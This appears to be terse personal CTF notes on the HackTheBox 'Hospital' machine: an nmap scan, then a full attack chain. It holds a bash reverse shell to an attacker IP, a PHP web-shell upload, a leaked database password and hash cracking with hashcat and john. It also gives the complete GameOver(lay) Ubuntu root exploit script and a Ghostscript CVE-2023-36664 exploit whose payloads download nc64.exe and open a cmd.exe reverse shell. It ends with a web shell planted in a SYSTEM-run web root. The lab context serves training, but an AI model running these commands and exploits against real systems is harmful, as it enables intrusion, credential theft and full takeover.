🏥

Hospital

 
22,53,88,135,139,389,443,445,464,593,636,1801,2103,2105,2107,2179,3268,3269,3389,5985,6062,6404,6406,6407,6409,6613,6633,8080,9389
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 e14b4b3a6d18666939f7aa74b3160aaa (ECDSA) |_ 256 96c1dcd8972095e7015f20a24361cbca (ED25519) 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-04 17:18:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Not valid before: 2023-09-06T10:49:03 |_Not valid after: 2028-09-06T10:49:03 443/tcp open ssl/http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28) |_http-title: Hospital Webmail :: Welcome to Hospital Webmail | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Not valid before: 2023-09-06T10:49:03 |_Not valid after: 2028-09-06T10:49:03 1801/tcp open msmq? 2103/tcp open msrpc Microsoft Windows RPC 2105/tcp open msrpc Microsoft Windows RPC 2107/tcp open msrpc Microsoft Windows RPC 2179/tcp open vmrdp? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Not valid before: 2023-09-06T10:49:03 |_Not valid after: 2028-09-06T10:49:03 3269/tcp open globalcatLDAPssl? | ssl-cert: Subject: commonName=DC | Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb | Not valid before: 2023-09-06T10:49:03 |_Not valid after: 2028-09-06T10:49:03 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=DC.hospital.htb | Not valid before: 2023-09-05T18:39:34 |_Not valid after: 2024-03-06T18:39:34 | rdp-ntlm-info: | Target_Name: HOSPITAL | NetBIOS_Domain_Name: HOSPITAL | NetBIOS_Computer_Name: DC | DNS_Domain_Name: hospital.htb | DNS_Computer_Name: DC.hospital.htb | DNS_Tree_Name: hospital.htb | Product_Version: 10.0.17763 |_ System_Time: 2024-01-04T17:19:45+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 6062/tcp open msrpc Microsoft Windows RPC 6404/tcp open msrpc Microsoft Windows RPC 6406/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 6407/tcp open msrpc Microsoft Windows RPC 6409/tcp open msrpc Microsoft Windows RPC 6613/tcp open msrpc Microsoft Windows RPC 6633/tcp open msrpc Microsoft Windows RPC 8080/tcp open http Apache httpd 2.4.55 ((Ubuntu)) |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.55 (Ubuntu) | http-title: Login |_Requested resource was login.php | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set 9389/tcp open mc-nmf .NET Message Framing Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Linux 5.X|4.X (92%) OS CPE: cpe:/o:linux:linux_kernel:5.0 cpe:/o:linux:linux_kernel:4 Aggressive OS guesses: Linux 5.0 (92%), Linux 4.15 - 5.6 (85%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 311: |_ Message signing enabled and required |_clock-skew: mean: 6h59m40s, deviation: 0s, median: 6h59m40s | smb2-time: | date: 2024-01-04T17:19:47 |_ start_date: N/A
dc.hospital.htb. 3600 IN A 192.168.5.1 dc.hospital.htb. 3600 IN A 10.129.40.246 hospital.htb. 600 IN A 10.129.40.246 hospital.htb. 600 IN A 192.168.5.1
 
register on 8080
ivan:123456
p0wny-shell
flozzUpdated May 4, 2024
upload pwn.phar
Then use gobuster to find the path of uploads
notion image
sent a reverseshell
/usr/bin/bash -c "bash -i >& /dev/tcp/10.10.14.32/1234 0>&1"
notion image
 
notion image
define('DB_SERVER', 'localhost'); define('DB_USERNAME', 'root'); define('DB_PASSWORD', 'my$qls3rv1c3!'); define('DB_NAME', 'hospital');
notion image
connect to mysql
notion image
admin:$2y$10$caGIEbf9DBF7ddlByqCkrexkt0cPseJJ5FiVO1cnhG.3NLrxcjMh2 patient:$2y$10$a.lNstD7JdiNYxEepKf1/OZ5EM5wngYrf.m5RxXCgSud7MVU6/tgO
notion image
bcrypt
hashcat -m 3200 hashes.txt /usr/share/wordlists/rockyou.txt --user
notion image
admin:123456
nothing found, maybe it’s registered by other players..
notion image
it’s ubuntu 23.04
notion image
CVE-2023-2640-CVE-2023-32629
g1viUpdated Aug 6, 2024
#!/bin/bash # CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation # by g1vi https://github.com/g1vi # October 2023 echo "[+] You should be root now" echo "[+] Type 'exit' to finish and leave the house cleaned" unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
notion image
got this root
notion image
got the hashe from /etc/passwd
notion image
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
notion image
cracking by john
drwilliams:qwe123!@#
login success as emailer credentiality
notion image
 
python3 CVE_2023_36664_exploit.py --inject --payload "curl 10.10.14.32:8000/nc64.exe -o nc.exe" --filename file.eps python3 CVE_2023_36664_exploit.py --inject --payload "nc.exe 10.10.14.32 4444 -e cmd.exe" --filename file.eps
notion image
send the .eps file to contact
notion image
 
notion image
 
rpcclient hospital.htb -U drbrown
querydispinfo
notion image
PS C:\xampp> icacls htdocs htdocs NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F) BUILTIN\Administrators:(I)(OI)(CI)(F) BUILTIN\Users:(I)(OI)(CI)(RX) BUILTIN\Users:(I)(CI)(AD) BUILTIN\Users:(I)(CI)(WD) CREATOR OWNER:(I)(OI)(CI)(IO)(F) Successfully processed 1 files; Failed processing 0 files
xampp run as privilege of NT AUTHORITY\SYSTEM
cd C:\xampp\htdocs
upload the pw0nyshell on this folder ,then access.
notion image
done!